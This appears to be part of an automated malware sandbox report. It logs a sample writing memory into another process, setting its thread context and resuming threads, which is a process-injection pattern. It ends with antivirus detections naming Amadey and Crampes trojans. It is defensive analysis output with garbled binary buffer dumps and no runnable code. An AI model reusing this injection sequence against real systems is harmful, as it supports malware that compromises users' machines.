buffer: Ä#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#C(Cÿÿÿÿÿÿÿÿ€±¿DNæ@»u˜ÿÿÿÿ “   ÿÿÿÿHLCˆÂCˆÂCˆÂCˆÂCˆÂCÀÇCÈNCHPC ECÈÁC˜ÂCC  abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ¤`‚y‚!¦ß¡¥Ÿàü@~€ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þÈC˜êC˜êC˜êC˜êC˜êC˜êC˜êC˜êC˜êCÈCœêCœêCœêCœêCœêCœêCœêC..þÿÿÿþÿÿÿŒ7C.?AVbad_array_new_length@std@@Œ7C.?AVbad_alloc@std@@Œ7C.?AVexception@std@@Œ7C.?AVruntime_error@std@@Œ7C.?AVlogic_error@std@@Œ7C.?AVlength_error@std@@Œ7C.?AVout_of_range@std@@Œ7C.?AVsystem_error@std@@Œ7C.?AV_System_error@std@@Œ7C.?AVbad_exception@std@@Œ7C.?AVerror_category@std@@Œ7C.?AV_Generic_error_category@std@@Œ7C.?AVtype_info@@
base_address: 0x0043c000
process_identifier: 2768
process_handle: 0x00000170
1 1 0

WriteProcessMemory

buffer: €0€ H`ð}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x0043f000
process_identifier: 2768
process_handle: 0x00000170
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00440000
process_identifier: 2768
process_handle: 0x00000170
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2768
process_handle: 0x00000170
1 1 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4334931
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000038c
process_identifier: 2768
1 0 0

NtResumeThread

thread_handle: 0x0000038c
suspend_count: 1
process_identifier: 2768
1 0 0

NtResumeThread

thread_handle: 0x000002a8
suspend_count: 1
process_identifier: 2912
1 0 0

NtResumeThread

thread_handle: 0x000002fc
suspend_count: 1
process_identifier: 2912
1 0 0

NtResumeThread

thread_handle: 0x00000448
suspend_count: 1
process_identifier: 2912
1 0 0

NtResumeThread

thread_handle: 0x00000494
suspend_count: 1
process_identifier: 2912
1 0 0

NtResumeThread

thread_handle: 0x00000168
suspend_count: 1
process_identifier: 2964
1 0 0
Bkav W32.AIDetect.malware2
Elastic malicious (high confidence)
Cynet Malicious (score: 100)
McAfee RDN/Real Protect-LS
Cylance Unsafe
Sangfor Riskware.Win32.Agent.V9a4
K7AntiVirus Riskware ( 0052f7bd1 )
Alibaba Trojan:Win32/Crampes.6ae16964
K7GW Riskware ( 0052f7bd1 )
Cybereason malicious.0cca09
Symantec ML.Attribute.HighConfidence
tehtris Generic.Malware
ESET-NOD32 Win32/RiskWare.PEMalform.J
APEX Malicious
Kaspersky HEUR:Trojan.Win32.Crampes.a
BitDefender Trojan.GenericKD.64168461
MicroWorld-eScan Trojan.GenericKD.64168461
Avast Win32:Evo-gen [Trj]
Tencent Win32.Trojan.FalseSign.Ximw
Ad-Aware Trojan.GenericKD.64168461
Emsisoft Trojan.GenericKD.64168461 (B)
VIPRE Trojan.GenericKD.64168461
TrendMicro Trojan.Win32.AMADEY.YXCLJZ
McAfee-GW-Edition RDN/Real Protect-LS
Trapmine malicious.high.ml.score
FireEye Generic.mg.d332cf184ac8335d
Sophos Mal/Generic-S
GData Trojan.GenericKD.64168461
Jiangmin Trojan.Crampes.dv
Antiy-AVL Trojan/Win32.Dynamer
Gridinsoft Trojan.Win32.Agent.cl
Arcabit Trojan.Generic.D3D3220D
ZoneAlarm HEUR:Trojan.Win32.Crampes.a
Microsoft Trojan:Win32/Amadey.PAB!MTB
AhnLab-V3 Downloader/Win.Amadey.C5329944
MAX malware (ai score=89)
Malwarebytes Malware.AI.1616178918
TrendMicro-HouseCall Trojan.Win32.AMADEY.YXCLJZ
Rising Trojan.Swrort!8.296 (TFE:2:CCuO7nvtECH)
SentinelOne Static AI - Malicious PE
Fortinet Riskware/PEMalform
BitDefenderTheta Gen:NN.ZexaF.36106.tC2@aqUFHgli
AVG Win32:Evo-gen [Trj]
Panda Trj/CI.A